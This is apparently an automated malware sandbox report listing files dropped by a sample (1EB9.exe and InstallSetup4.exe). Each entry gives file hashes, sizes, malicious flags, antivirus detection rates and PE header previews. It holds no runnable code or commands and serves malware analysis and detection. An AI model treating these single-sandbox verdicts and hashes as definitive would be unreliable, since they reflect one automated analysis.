                                                                                                                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ablibh15.ojg.psm1

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1EB9.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):709120
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.498768708944228
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjUR6FDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9fT
                                                                                                                                                                                                                                                                                                                                                                MD5:B0292A40F16BC3D5A1FE839FAC1C825A
                                                                                                                                                                                                                                                                                                                                                                SHA1:251EAC5D723543D032DDC5608BAA69983F8E9454
                                                                                                                                                                                                                                                                                                                                                                SHA-256:FE4407292A58F6BFF72C10E5498E5278DB2978EFBCBD007D41199FCBFD510F41
                                                                                                                                                                                                                                                                                                                                                                SHA-512:27EF5594551EAB191D2A2428C77438AE449D245B3B88C5E0197D789AE94CF4EF116E2970529EC97C76FF5CF1EDD174A231193DCF0C96C91C676B773AFD6E3515
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_RegDLL.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.026670007889822
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                                                                                                                                                                                                                                                                                                MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                                                                                                                                                                                                                                                                                                SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                                                                                                                                                                                                                                                                                                SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                                                                                                                                                                                                                                                                                                SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2560
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):19456
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8975201046735535
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                                                                                                                                                                                                                                                                                                                MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                                                                                                                                                                                                                                                                                                                SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                                                                                                                                                                                                                                                                                                                SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                                                                                                                                                                                                                                                                                                                SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.215994423157539
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                                                                                                                                                                                                                                                MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                                                                                                                                                                                                                                                SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                                                                                                                                                                                                                                                SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_shfoldr.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1EB9.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):709120
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.498768708944228
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjUR6FDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9fT
                                                                                                                                                                                                                                                                                                                                                                MD5:B0292A40F16BC3D5A1FE839FAC1C825A
                                                                                                                                                                                                                                                                                                                                                                SHA1:251EAC5D723543D032DDC5608BAA69983F8E9454
                                                                                                                                                                                                                                                                                                                                                                SHA-256:FE4407292A58F6BFF72C10E5498E5278DB2978EFBCBD007D41199FCBFD510F41
                                                                                                                                                                                                                                                                                                                                                                SHA-512:27EF5594551EAB191D2A2428C77438AE449D245B3B88C5E0197D789AE94CF4EF116E2970529EC97C76FF5CF1EDD174A231193DCF0C96C91C676B773AFD6E3515
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nss46EF.tmp\INetC.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.391050633650523
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:pjj9e9dE95XD+iTx58Y5oMM3O9MEoLr1VcQZ/ZwcSyekMRlZ4L4:dAvE90GuY2tO93oLrJRM7Z4E
                                                                                                                                                                                                                                                                                                                                                                MD5:40D7ECA32B2F4D29DB98715DD45BFAC5
                                                                                                                                                                                                                                                                                                                                                                SHA1:124DF3F617F562E46095776454E1C0C7BB791CC7
                                                                                                                                                                                                                                                                                                                                                                SHA-256:85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5FD4F516CE23FB7E705E150D5C1C93FC7133694BA495FB73101674A528883A013A34AB258083AA7CE6072973B067A605158316A4C9159C1B4D765761F91C513D
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'9<.cXR.cXR.cXR.D.).jXR.cXS.6XR.D. .`XR.D.(.bXR.D...bXR.D.*.bXR.RichcXR.........................PE..L....T.[...........!.....@...j.......E.......P.......................................................................M..l...\F..d.......(.......................\.......................................................d............................text...\>.......@.................. ..`.data...dW...P.......D..............@....rsrc...(............R..............@..@.reloc..\............\..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsx5151.tmp

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):327680
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.488997949477586
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:i88LuFIhUJfTi0aFS8t4pcABVjtRYkM+:18SFIhUJLWDap/B1
                                                                                                                                                                                                                                                                                                                                                                MD5:7C0B88535C506FC8BEC1510F08F3329C
                                                                                                                                                                                                                                                                                                                                                                SHA1:026965F027F53725E0E93D069A7143D12BADD35C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7F2B4169D20BB191467B02ABCAE4DBC05E80BB5A20AECE8E3D04AAC7F05B0382
                                                                                                                                                                                                                                                                                                                                                                SHA-512:3E5D80F017B99E556A2CE8AC1849AC52E5E1EC38812D015E1DD8E4C276C45E3B5462CA0961D3C806113266B130B350FC993F6734A07A093A5A50BCCC7C5F160B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L....W.d.....................H.......$............@..........................p$.................................................d....P..x...............................................................@............................................text............................... ..`.rdata...\.......^..................@..@.data...d%... ...R..................@....rsrc...x. ..P.......Z..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\SDL2.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1007104
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.652666405660804
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:hEbJuxlv9Sawf3oEYsTXR7fxiGmUDZ/HJkAVJcJdKll6/QTjFZLFGPQRGnx54IC5:zlv9SlEJ8C/KjFnMMvvS4
                                                                                                                                                                                                                                                                                                                                                                MD5:AE58662A16410481B477B78B8D47460B
                                                                                                                                                                                                                                                                                                                                                                SHA1:FB8B1BA166913C18EB00F8CA53439D0F4EE54359
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A23D944BEA101C574875C13883088798CFDA712DE969DD14F529E870A0DE87DA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:93280D9AB366B3DFAE6E40E50984764FAB7BE6CA6BD2B5A24D1182D67F06F9CC50203CC3D01A4232593C0C1AD03DFAE56E119286D10B78D2E3D57B394BDA8778
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.%S...........#.....J...Z...4..0........`....tl................................=......... ..........................;... .......`.......................p..Pp...........................P.......................$...............................text...$I.......J..................`.P`.data...H/...`...0...N..............@.`..rdata...............~..............@.`@.bss....P3............................`..edata...;.......<..................@.0@.idata....... ......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc..Pp...p...r..................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\avcodec-58.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):5607950
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.633599482017416
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:8IS8iFbnejXFHVSh3z6+N5NeOYVxtAcPVBgkgrumYE1HpMTdy2/vlCyUIs:85hCFVSh3fN5NeOYVxLPVBcumzJMTdyx
                                                                                                                                                                                                                                                                                                                                                                MD5:90593C11E9997DD4224CF278D5D66323
                                                                                                                                                                                                                                                                                                                                                                SHA1:A89583C180A66FE2C8272F8CCD9876326CB29A1E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:82AA37DDE211EE28B366603CC9C74F0584ED46D57DF7C06447060BFCFF886A07
                                                                                                                                                                                                                                                                                                                                                                SHA-512:93A8CDFD26B4684FBBCB6FF8487E77C4996BD48B58D38FB81FE7E243D1368342F2ED27A1219CB81A9CBED72FDD4061ACE091D95C326A4C3DFF84D59E9A45114A
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........U........#...$..;...U..b$...........<..............................pz.......U...@... .......................x.......x..#....y.p.................... y.8E...........................gN.....................P.x..............................text...t.;.......;.................`.``.data...\.....<.......;.............@.`..rdata.......<.......<.............@.p@/4.......v....O..x....O.............@.0@.bss.....`$..0T.......................`..edata........x.......T.............@.0@.idata...#....x..$... T.............@.0..CRT....,.....x......DT.............@.0..tls..........y......FT.............@.0..rsrc...p.....y......HT.............@.0..reloc..8E... y..F...LT.............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\avformat-58.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):2598926
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2658394092546565
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:i5AIqzwPbYgLHcIE0DtbfgQPKaGSR+J8QVPqFk8QCMJn:i5AIqMPbYgLastLzPzGSR+J8QVPq9Q
                                                                                                                                                                                                                                                                                                                                                                MD5:608FC55E2116CDCB88C3CF98B206017A
                                                                                                                                                                                                                                                                                                                                                                SHA1:D73E406A963D160D164D686EA25611E8771ADEBF
                                                                                                                                                                                                                                                                                                                                                                SHA-256:B39CF5A71B85B2CD233093EF7D55B39DB025DA78E080B38C070ACCF1436A2B4F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:8098EDD9C1E399925EC0A07BCD277F8634E72D156A75F9A5AF25809B0AEEA8C592CD45772E756F5546E87868756A28476EC53756EC87D79B242E9F16C4DF983F
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........'........#...$......'...............................................(.......(...@... .......................&.......&..?...0'......................@'..............................I#.......................&..............................text...............................`.P`.data...<...........................@.`..rdata..x...........................@.`@/4............#.......#.............@.0@.bss....p.....&.......................`..edata........&.......&.............@.0@.idata...?....&..@....&.............@.0..CRT....,.....'.......&.............@.0..tls......... '.......&.............@.0..rsrc........0'.......&.............@.0..reloc.......@'.......&.............@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\VB Smart Card Viewer\avutil-56.dll (copy)

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):698382
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.476081490774289
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:Y8ncCX9jvWgnTMfFj/QhZmyF3yBRAotqlFRHEnWiGGLN:YscCNj3TGFTQhgyF3yBRAyqqV5
                                                                                                                                                                                                                                                                                                                                                                MD5:7C4C4A4D5684E8AACDC6B118A601A7BB
                                                                                                                                                                                                                                                                                                                                                                SHA1:64C8CC24339D73909916E303AB08A253DD49FE3F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:D20E213EF79F5F58CF6CA45812648E21612AF6B82F52EEEE044EA050AB32D75E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DB34326A59C7E5E809DE1DA9C98D5464D753DD554E9C8DDDC32F164BFE9D637A5D5C6AE093905B8CA075B6801FD0D53E34E6400C7F9E1D553E33618A9BAADEEA
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
